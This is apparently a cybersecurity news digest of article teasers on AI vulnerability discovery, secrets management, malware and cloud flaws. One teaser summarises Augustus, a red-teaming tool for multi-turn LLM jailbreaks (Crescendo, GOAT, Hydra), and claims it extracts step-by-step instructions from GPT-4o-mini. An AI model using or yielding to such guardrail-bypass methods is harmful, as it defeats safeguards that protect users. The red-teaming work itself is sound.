Project Glasswing: When AI Becomes the Ultimate Hacker—And Defender
The episode dives into Anthropic's secretive Project Glasswing, built around the unreleased Claude Mythos model that can autonomously discover zero‑day vulnerabilities and chain exploits. Hosts Kevin Tackett and Scott Wright debate the hype versus reality, arguing that while the AI could revolutionize defensive security, it also risks amplifying offensive threats if misused. They critique the current vulnerability‑fix pipeline, noting that finding bugs without funding fixes merely adds noise, and raise concerns about regulatory, compliance, and nation‑state implications of such powerful AI tools.
Anchore Enterprise and the DoD DevSecOps Reference Design
Anchore Enterprise has been tightly woven into the Department of Defense’s DevSecOps Reference Design, providing automated security guardrails across every stage of the software factory. By generating SBOMs, enforcing policy‑as‑code, and continuously scanning containers, Anchore stops vulnerable code before it...
XDR vs SIEM vs SOAR: What’s the Right Cybersecurity Strategy in 2026?
The article examines the evolving roles of SIEM, SOAR and XDR in 2026, emphasizing that no single tool can address modern threat landscapes alone. While SIEM provides foundational log collection and compliance, SOAR automates response workflows, and XDR delivers context‑rich,...
Workload IAM Vs. Secrets Management: A Practical Decision Guide
Most organizations begin non‑human identity security with a secrets manager, but exploding credential sprawl and the secret‑zero problem expose its limits. GitGuardian found 29 million secrets leaked on GitHub in 2025, a 34 percent rise, and Verizon still flags credential abuse as...
GlassWorm Attack Installs Fake Browser Extension for Surveillance
GlassWorm is a multi‑stage malware chain that infiltrates developers through malicious npm, PyPI or VS Code packages. After a pre‑install script runs, it contacts the Solana blockchain to fetch a second‑stage infostealer that harvests browser extensions, crypto wallet seeds, cloud and...
Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and From the Internet
A critical Azure API Management (APIM) flaw lets attackers bypass the "disable signup" toggle and create accounts anonymously. Praetorian’s research shows 97.9% of internet‑facing Developer Portals still accept signup requests, exposing valid API keys and backend data. The vulnerability stems...
Secrets Management Vs. Secrets Elimination: Where Should You Invest?
Enterprises are weighing two divergent authentication philosophies: traditional secrets management, which safeguards static credentials in vaults, and secretless authentication, which eliminates static secrets by issuing short‑lived tokens tied to workload identities. While secretless reduces attack surface and operational friction for...
Augustus v0.0.9: Multi-Turn Attacks for LLMs That Fight Back
Augustus v0.0.9 adds a unified engine for multi‑turn LLM attacks, offering four distinct strategies—Crescendo, GOAT, Hydra, and Mischievous User. The tool demonstrates that conversational context can bypass modern guardrails, extracting step‑by‑step instructions from GPT‑4o‑mini in as few as two turns. Hydra’s back‑tracking...
Mapping the Unknown: Introducing Pius for Organizational Asset Discovery
Praetorian has released Pius, an open‑source Go binary that consolidates asset discovery across five Regional Internet Registries, Certificate Transparency logs, and more than 20 intelligence sources. The tool normalizes data, assigns confidence scores, and outputs results in formats ready for...
There’s Always Something: Secrets Detection at Engagement Scale with Titus
Praetorian released Titus, an open‑source secret scanner built in Go that runs as a CLI, library, Burp Suite, or Chrome extension. It inherits Nosey Parker’s 450+ detection rules and adds binary file extraction and a validation framework that confirms whether...